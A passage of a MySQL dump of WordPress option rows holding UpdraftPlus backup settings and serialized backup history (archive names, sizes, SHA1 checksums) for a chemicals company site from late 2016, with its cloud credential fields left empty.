INSERT INTO `wp_options` VALUES (17796, 'updraft_dir', 'updraft', 'yes'); 
INSERT INTO `wp_options` VALUES (17797, 'updraft_email', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17798, 'updraft_delete_local', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (17799, 'updraft_debug_mode', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (17800, 'updraft_include_plugins', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (17801, 'updraft_include_themes', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (17802, 'updraft_include_uploads', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (17803, 'updraft_include_others', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (17804, 'updraft_include_wpcore', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (17805, 'updraft_include_wpcore_exclude', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17806, 'updraft_include_more', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (17807, 'updraft_include_blogs', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17808, 'updraft_include_mu-plugins', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17809, 'updraft_include_others_exclude', 'upgrade,cache,updraft,backup*,*backups,mysql.sql,debug.log', 'yes'); 
INSERT INTO `wp_options` VALUES (17810, 'updraft_include_uploads_exclude', 'backup*,*backups,backwpup*,wp-clone,snapshots', 'yes'); 
INSERT INTO `wp_options` VALUES (17811, 'updraft_lastmessage', 'The backup apparently succeeded and is now complete (Nov 04 01:33:38)', 'yes'); 
INSERT INTO `wp_options` VALUES (17812, 'updraft_googledrive_token', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17813, 'updraft_dropboxtk_request_token', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17814, 'updraft_dropboxtk_access_token', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17815, 'updraft_dropbox_folder', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17816, 'updraft_adminlocking', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17817, 'updraft_updraftvault', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17818, 'updraft_retain_extrarules', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (17819, 'updraft_googlecloud', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17820, 'updraft_include_more_path', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (17821, 'updraft_split_every', '400', 'yes'); 
INSERT INTO `wp_options` VALUES (17822, 'updraft_ssl_nossl', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (17823, 'updraft_backupdb_nonwp', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (17824, 'updraft_extradbs', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (17826, 'updraft_last_backup', 'a:5:{s:11:"backup_time";i:1478222542;s:12:"backup_array";a:22:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-plugins.zip";}s:12:"plugins-size";i:60776753;s:6:"themes";a:1:{i:0;s:73:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads.zip";i:1;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads2.zip";i:2;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads3.zip";i:3;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads4.zip";i:4;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads5.zip";i:5;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads6.zip";i:6;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads7.zip";i:7;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads8.zip";i:8;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads9.zip";i:9;s:76:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads10.zip";i:10;s:76:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads11.zip";i:11;s:76:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads12.zip";}s:12:"uploads-size";i:408678860;s:13:"uploads1-size";i:417462386;s:13:"uploads2-size";i:412445725;s:13:"uploads3-size";i:418814261;s:13:"uploads4-size";i:390372680;s:13:"uploads5-size";i:420762845;s:13:"uploads6-size";i:405870935;s:13:"uploads7-size";i:430349439;s:13:"uploads8-size";i:426724928;s:13:"uploads9-size";i:408758626;s:14:"uploads10-size";i:420359525;s:14:"uploads11-size";i:176302331;s:6:"others";a:1:{i:0;s:73:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-others.zip";}s:11:"others-size";i:1552254;s:2:"db";s:68:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-db.gz";s:7:"db-size";i:1892120;s:9:"checksums";a:1:{s:4:"sha1";a:16:{s:8:"plugins0";s:40:"7e5bf3411d9c1428dfde3c5229011217fbf7da93";s:7:"themes0";s:40:"1dae20db401e5129650f66b1c74d460a6a4ac650";s:8:"uploads0";s:40:"a277d05f0d67d18abf0e4c0cc712f7947bd086dc";s:8:"uploads1";s:40:"3e7a59c4632b87b390245a8a318f459e1f83cbd1";s:8:"uploads2";s:40:"ff511c9ed35226193f1abeeaf3c172bc4b56921d";s:8:"uploads3";s:40:"d51a1d1ad481c18838202825885850c20456e557";s:8:"uploads4";s:40:"69c622e2f59da01bd74abeda737bd0ac4e68ddcc";s:8:"uploads5";s:40:"8925694ef41c4ec68866e5640cb8667c32925eba";s:8:"uploads6";s:40:"75ca727a16e72ead75f203e2e73d3b9df9e68cd1";s:8:"uploads7";s:40:"415fa366b1c90e22cdac91d25a2966e9506a2a46";s:8:"uploads8";s:40:"7ed24b8e4df976c726ed9c82b5c7af4a6e29a675";s:8:"uploads9";s:40:"ab58d7e152d2eab3ae59c6fb9bfca447e5b13f03";s:9:"uploads10";s:40:"a85f8fdc481726509928d9ff5c1dd3b60c0e238b";s:9:"uploads11";s:40:"5e6ce3db3186bdaf1a48ca5f53b2ee52fe62965d";s:7:"others0";s:40:"624b896d860315721f58b92ff3568b4960e27b36";s:3:"db0";s:40:"2ff76baa21387405846450c00e6de95657719619";}}}s:7:"success";i:1;s:6:"errors";a:0:{}s:12:"backup_nonce";s:12:"70c2f0905d70";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17827, 'updraft_starttime_files', '01:24', 'yes'); 
INSERT INTO `wp_options` VALUES (17828, 'updraft_starttime_db', '01:24', 'yes'); 
INSERT INTO `wp_options` VALUES (17829, 'updraft_startday_db', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (17830, 'updraft_startday_files', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (17831, 'updraft_sftp_settings', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17832, 'updraft_s3', 'a:3:{s:9:"accesskey";s:0:"";s:9:"secretkey";s:0:"";s:4:"path";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17833, 'updraft_s3generic', 'a:4:{s:8:"endpoint";s:0:"";s:9:"accesskey";s:0:"";s:9:"secretkey";s:0:"";s:4:"path";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17834, 'updraft_dreamhost', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17835, 'updraft_s3generic_login', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17836, 'updraft_s3generic_pass', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17837, 'updraft_s3generic_remote_path', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17838, 'updraft_s3generic_endpoint', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17839, 'updraft_webdav_settings', 'a:1:{s:3:"url";N;}', 'yes'); 
INSERT INTO `wp_options` VALUES (17840, 'updraft_openstack', 'a:6:{s:7:"authurl";s:0:"";s:6:"tenant";s:0:"";s:6:"region";s:0:"";s:4:"user";s:0:"";s:8:"password";s:0:"";s:4:"path";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17841, 'updraft_bitcasa', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (17842, 'updraft_copycom', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (17843, 'updraft_onedrive', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (17844, 'updraft_azure', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (17845, 'updraft_cloudfiles', 'a:5:{s:7:"authurl";s:35:"https://auth.api.rackspacecloud.com";s:6:"region";s:3:"DFW";s:4:"user";s:0:"";s:6:"apikey";s:0:"";s:4:"path";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17846, 'updraft_cloudfiles_user', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17847, 'updraft_cloudfiles_apikey', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17848, 'updraft_cloudfiles_path', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17849, 'updraft_cloudfiles_authurl', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17850, 'updraft_ssl_useservercerts', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (17851, 'updraft_ssl_disableverify', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (17852, 'updraft_s3_login', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17853, 'updraft_s3_pass', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17854, 'updraft_s3_remote_path', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17855, 'updraft_dreamobjects_login', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17856, 'updraft_dreamobjects_pass', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17857, 'updraft_dreamobjects_remote_path', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17858, 'updraft_dreamobjects', 'a:4:{s:8:"endpoint";s:26:"objects-us-west-1.dream.io";s:9:"accesskey";s:0:"";s:9:"secretkey";s:0:"";s:4:"path";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17859, 'updraft_report_warningsonly', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (17860, 'updraft_report_wholebackup', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (17861, 'updraft_log_syslog', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (17862, 'updraft_extradatabases', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17863, 'updraft_backup_history', 'a:21:{i:1478222542;a:26:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-plugins.zip";}s:12:"plugins-size";i:60776753;s:6:"themes";a:1:{i:0;s:73:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads.zip";i:1;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads2.zip";i:2;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads3.zip";i:3;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads4.zip";i:4;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads5.zip";i:5;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads6.zip";i:6;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads7.zip";i:7;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads8.zip";i:8;s:75:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads9.zip";i:9;s:76:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads10.zip";i:10;s:76:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads11.zip";i:11;s:76:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-uploads12.zip";}s:12:"uploads-size";i:408678860;s:13:"uploads1-size";i:417462386;s:13:"uploads2-size";i:412445725;s:13:"uploads3-size";i:418814261;s:13:"uploads4-size";i:390372680;s:13:"uploads5-size";i:420762845;s:13:"uploads6-size";i:405870935;s:13:"uploads7-size";i:430349439;s:13:"uploads8-size";i:426724928;s:13:"uploads9-size";i:408758626;s:14:"uploads10-size";i:420359525;s:14:"uploads11-size";i:176302331;s:6:"others";a:1:{i:0;s:73:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-others.zip";}s:11:"others-size";i:1552254;s:2:"db";s:68:"backup_2016-11-04-0122_MillerStephenson_Chemicals_70c2f0905d70-db.gz";s:7:"db-size";i:1892120;s:9:"checksums";a:1:{s:4:"sha1";a:16:{s:8:"plugins0";s:40:"7e5bf3411d9c1428dfde3c5229011217fbf7da93";s:7:"themes0";s:40:"1dae20db401e5129650f66b1c74d460a6a4ac650";s:8:"uploads0";s:40:"a277d05f0d67d18abf0e4c0cc712f7947bd086dc";s:8:"uploads1";s:40:"3e7a59c4632b87b390245a8a318f459e1f83cbd1";s:8:"uploads2";s:40:"ff511c9ed35226193f1abeeaf3c172bc4b56921d";s:8:"uploads3";s:40:"d51a1d1ad481c18838202825885850c20456e557";s:8:"uploads4";s:40:"69c622e2f59da01bd74abeda737bd0ac4e68ddcc";s:8:"uploads5";s:40:"8925694ef41c4ec68866e5640cb8667c32925eba";s:8:"uploads6";s:40:"75ca727a16e72ead75f203e2e73d3b9df9e68cd1";s:8:"uploads7";s:40:"415fa366b1c90e22cdac91d25a2966e9506a2a46";s:8:"uploads8";s:40:"7ed24b8e4df976c726ed9c82b5c7af4a6e29a675";s:8:"uploads9";s:40:"ab58d7e152d2eab3ae59c6fb9bfca447e5b13f03";s:9:"uploads10";s:40:"a85f8fdc481726509928d9ff5c1dd3b60c0e238b";s:9:"uploads11";s:40:"5e6ce3db3186bdaf1a48ca5f53b2ee52fe62965d";s:7:"others0";s:40:"624b896d860315721f58b92ff3568b4960e27b36";s:3:"db0";s:40:"2ff76baa21387405846450c00e6de95657719619";}}s:5:"nonce";s:12:"70c2f0905d70";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.23.1";s:12:"is_multisite";b:0;}i:1478173818;a:26:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-plugins.zip";}s:12:"plugins-size";i:60713041;s:6:"themes";a:1:{i:0;s:73:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads.zip";i:1;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads2.zip";i:2;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads3.zip";i:3;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads4.zip";i:4;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads5.zip";i:5;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads6.zip";i:6;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads7.zip";i:7;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads8.zip";i:8;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads9.zip";i:9;s:76:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads10.zip";i:10;s:76:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads11.zip";i:11;s:76:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads12.zip";}s:12:"uploads-size";i:423987176;s:13:"uploads1-size";i:413439728;s:13:"uploads2-size";i:413916670;s:13:"uploads3-size";i:418197239;s:13:"uploads4-size";i:386933088;s:13:"uploads5-size";i:419954452;s:13:"uploads6-size";i:420784504;s:13:"uploads7-size";i:425703058;s:13:"uploads8-size";i:421350775;s:13:"uploads9-size";i:416881103;s:14:"uploads10-size";i:411528772;s:14:"uploads11-size";i:221326056;s:6:"others";a:1:{i:0;s:73:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-others.zip";}s:11:"others-size";i:1552250;s:2:"db";s:68:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-db.gz";s:7:"db-size";i:1887612;s:9:"checksums";a:1:{s:4:"sha1";a:16:{s:8:"plugins0";s:40:"c172d4bde32167d66109def83b63c8af8faf91b7";s:7:"themes0";s:40:"1dae20db401e5129650f66b1c74d460a6a4ac650";s:8:"uploads0";s:40:"66c1dac2f3f92c779e59ee5352c22ecfa4c7213d";s:8:"uploads1";s:40:"5033c6d8cfed3822ad9e370db67ecfffe17b44a5";s:8:"uploads2";s:40:"25011c641e4644440017728dbb3a2b7ae476e7c2";s:8:"uploads3";s:40:"9925fb36347c4b86f33166372fe3175e2faf5de0";s:8:"uploads4";s:40:"d301de98b6a1cbc414eddd954dffb9fd048b944a";s:8:"uploads5";s:40:"d4ae397ab879e09d594194cedc07d87c264d3a22";s:8:"uploads6";s:40:"c55459fb93c0babd0f11eee612aa9d31f4dd3b51";s:8:"uploads7";s:40:"647411d9422d919378dfca32fda48e5d0e3ea21f";s:8:"uploads8";s:40:"0108131d6d3a7ca5855d2b514323e63e2813a99a";s:8:"uploads9";s:40:"571114b59f2f95f105fa77089f9cd785447483ff";s:9:"uploads10";s:40:"6a89c9c3b7c98c268c0287c37cff0141e176e849";s:9:"uploads11";s:40:"84e5009623827b852653f0f271a388b9ae0b8baa";s:7:"others0";s:40:"97aab35e0d6636f435684defb7683c8021c62735";s:3:"db0";s:40:"33f36413115958b44eb8fb7b4692a1ba5b9ab87c";}}s:5:"nonce";s:12:"90a272988531";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.23.1";s:12:"is_multisite";b:0;}i:1478172870;a:26:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-plugins.zip";}s:12:"plugins-size";i:60713041;s:6:"themes";a:1:{i:0;s:73:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-uploads.zip";i:1;s:75:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-uploads2.zip";i:2;s:75:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-uploads3.zip";i:3;s:75:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-uploads4.zip";i:4;s:75:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-uploads5.zip";i:5;s:75:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-uploads6.zip";i:6;s:75:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-uploads7.zip";i:7;s:75:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-uploads8.zip";i:8;s:75:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-uploads9.zip";i:9;s:76:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-uploads10.zip";i:10;s:76:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-uploads11.zip";i:11;s:76:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-uploads12.zip";}s:12:"uploads-size";i:412718203;s:13:"uploads1-size";i:421846283;s:13:"uploads2-size";i:416779088;s:13:"uploads3-size";i:418197239;s:13:"uploads4-size";i:386933088;s:13:"uploads5-size";i:428716034;s:13:"uploads6-size";i:412022922;s:13:"uploads7-size";i:425703058;s:13:"uploads8-size";i:415505779;s:13:"uploads9-size";i:406428059;s:14:"uploads10-size";i:427826812;s:14:"uploads11-size";i:221326056;s:6:"others";a:1:{i:0;s:73:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-others.zip";}s:11:"others-size";i:1552439;s:2:"db";s:68:"backup_2016-11-03-1134_MillerStephenson_Chemicals_3da267966152-db.gz";s:7:"db-size";i:1886950;s:9:"checksums";a:1:{s:4:"sha1";a:16:{s:8:"plugins0";s:40:"3a10950d7c4c203273e5ed543ee6722abb632a08";s:7:"themes0";s:40:"ab9f7d6a06c33d03b2786a288833fff843825860";s:8:"uploads0";s:40:"e17b75f370a03683d9e01d7c8edc322e4b2b7c20";s:8:"uploads1";s:40:"13876b19c7251a8ccacfa9f8c5cfefc16eacee64";s:8:"uploads2";s:40:"c042deaacbaaf6b1eb7d1cdf693306275aed23a0";s:8:"uploads3";s:40:"fc13b388fccadcc86698e2b2331b898ca3d7ed68";s:8:"uploads4";s:40:"8c31d34bfa23848a5273a7732764e9413e5e7041";s:8:"uploads5";s:40:"4f0935208432cbb07fbec3c6160bdc6f021e86c9";s:8:"uploads6";s:40:"78cb65ef5b00dd4b14bb9ae2db3de44d7e5d4471";s:8:"uploads7";s:40:"606e1ab8f3f7f91990a48a3a167a196e04466219";s:8:"uploads8";s:40:"d71435e5cb24bb65f5668f06a166654983ef6bad";s:8:"uploads9";s:40:"270c2a74b48d760bafdf2d9acbb4c527cbc27b82";s:9:"uploads10";s:40:"b9aff16c9feebf2aa036c5ae9a7851ea27e4dbb7";s:9:"uploads11";s:40:"c67cbe69d8b56f142c5e9a9bacc8593cf568fffa";s:7:"others0";s:40:"b1145c9b9d6ab8117136dce04886b2bef8657bab";s:3:"db0";s:40:"44de20e5ce140a9dfecfee5caa0da9f1a36bfc4e";}}s:5:"nonce";s:12:"3da267966152";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.23.1";s:12:"is_multisite";b:0;}i:1478115411;a:26:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-plugins.zip";}s:12:"plugins-size";i:59705090;s:6:"themes";a:1:{i:0;s:73:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:14:{i:0;s:74:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-uploads.zip";i:1;s:75:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-uploads2.zip";i:2;s:75:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-uploads3.zip";i:3;s:75:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-uploads4.zip";i:4;s:75:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-uploads5.zip";i:5;s:75:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-uploads6.zip";i:6;s:75:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-uploads7.zip";i:7;s:75:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-uploads8.zip";i:8;s:75:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-uploads9.zip";i:9;s:76:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-uploads10.zip";i:10;s:76:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-uploads11.zip";i:11;s:76:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-uploads12.zip";i:12;s:76:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-uploads13.zip";i:13;s:76:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-uploads14.zip";}s:12:"uploads-size";i:410069946;s:13:"uploads1-size";i:413364033;s:13:"uploads4-size";i:411726110;s:13:"uploads5-size";i:414015151;s:13:"uploads6-size";i:410406494;s:13:"uploads7-size";i:400672526;s:13:"uploads8-size";i:389467834;s:13:"uploads9-size";i:399662738;s:14:"uploads10-size";i:389956633;s:14:"uploads11-size";i:408345677;s:14:"uploads12-size";i:425240711;s:14:"uploads13-size";i:317380032;s:6:"others";a:1:{i:0;s:73:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-others.zip";}s:11:"others-size";i:1552439;s:2:"db";s:68:"backup_2016-11-02-1936_MillerStephenson_Chemicals_59639c92ae67-db.gz";s:7:"db-size";i:1887988;s:9:"checksums";a:1:{s:4:"sha1";a:18:{s:8:"plugins0";s:40:"a4604ed584b549afbff644f29a2b1d2cbba7bbae";s:7:"themes0";s:40:"e41ee633ff6198fe7777f768804e7a0224257b45";s:8:"uploads0";s:40:"6b09d6840b4b1e4d15c446170b5657ef95315d7f";s:8:"uploads1";s:40:"c245d5abc8988bae06fb0a74b32a6ac1dc2cfc88";s:8:"uploads2";s:40:"30f5d4fb9bbe828aff0f666b1ac61415e198e43a";s:8:"uploads3";s:40:"d37bc00d41b9b87cf950a837236ce462707467f7";s:8:"uploads4";s:40:"e32721fc963e5c26171f85997eb27a308b9b5c9f";s:8:"uploads5";s:40:"9aee1caaf82d1ef407f8d9bbaebf30f718ca938a";s:8:"uploads6";s:40:"5a3b3ad94bcbc94befd52b1172267b213048d10f";s:8:"uploads7";s:40:"95f161edacfd38828405de5630e1955e2fec7616";s:8:"uploads8";s:40:"a9e60d3b27b1ce6d2ebcb4c4adc1fa4b0de80324";s:8:"uploads9";s:40:"643a211331749ba2773e59cb5d38faf72d3c5943";s:9:"uploads10";s:40:"4cfbc71aa8c109f191043aa8cb35d85e8051334b";s:9:"uploads11";s:40:"3a21c2dfe6d72bbecab770e7eb666fb1acc0c081";s:9:"uploads12";s:40:"b5254cc811f38fe9d88bef8757f2f459e089e2ac";s:9:"uploads13";s:40:"134bcdea2121802a6ec298b7cc9ecdbdd1725d32";s:7:"others0";s:40:"b1093df1b959d3bf6692d42fdc2823848fcae0c6";s:3:"db0";s:40:"2050882ed2414edbf33a9ee12cfa961c2f75a449";}}s:5:"nonce";s:12:"59639c92ae67";s:7:"service";a:1:{i:0;s:3:"ftp";}s:18:"created_by_version";s:9:"2.12.23.1";s:12:"is_multisite";b:0;}i:1477617731;a:26:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-plugins.zip";}s:12:"plugins-size";i:59705090;s:6:"themes";a:1:{i:0;s:73:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-uploads.zip";i:1;s:75:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-uploads2.zip";i:2;s:75:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-uploads3.zip";i:3;s:75:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-uploads4.zip";i:4;s:75:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-uploads5.zip";i:5;s:75:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-uploads6.zip";i:6;s:75:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-uploads7.zip";i:7;s:75:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-uploads8.zip";i:8;s:75:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-uploads9.zip";i:9;s:76:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-uploads10.zip";i:10;s:76:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-uploads11.zip";i:11;s:76:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-uploads12.zip";}s:12:"uploads-size";i:410069386;s:13:"uploads1-size";i:413364033;s:13:"uploads2-size";i:421383773;s:13:"uploads3-size";i:418798569;s:13:"uploads4-size";i:424750038;s:13:"uploads5-size";i:384372498;s:13:"uploads6-size";i:422395502;s:13:"uploads7-size";i:415263285;s:13:"uploads8-size";i:415962735;s:13:"uploads9-size";i:416805373;s:14:"uploads10-size";i:398548779;s:14:"uploads11-size";i:252295983;s:6:"others";a:1:{i:0;s:73:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-others.zip";}s:11:"others-size";i:1550617;s:2:"db";s:68:"backup_2016-10-28-0122_MillerStephenson_Chemicals_c67d3bb0c55d-db.gz";s:7:"db-size";i:1591591;s:9:"checksums";a:1:{s:4:"sha1";a:14:{s:8:"plugins0";s:40:"3ee265db8af6c3344f873df83080fa01fb7d98ac";s:7:"themes0";s:40:"dc22bb60ad8aac9591e52f73665ac3b5220dd320";s:8:"uploads0";s:40:"a94860492281510cf0225dafe126d62c82cba1bd";s:8:"uploads1";s:40:"0912e6f44fc1fe20d46a48386512d37651629ba0";s:8:"uploads2";s:40:"863041bb444cd77448195416df979eeaa3cee55d";s:8:"uploads3";s:40:"961fcd7ff6908e70b71f57f74fb591e08f98fb3f";s:8:"uploads4";s:40:"23c073fb78ca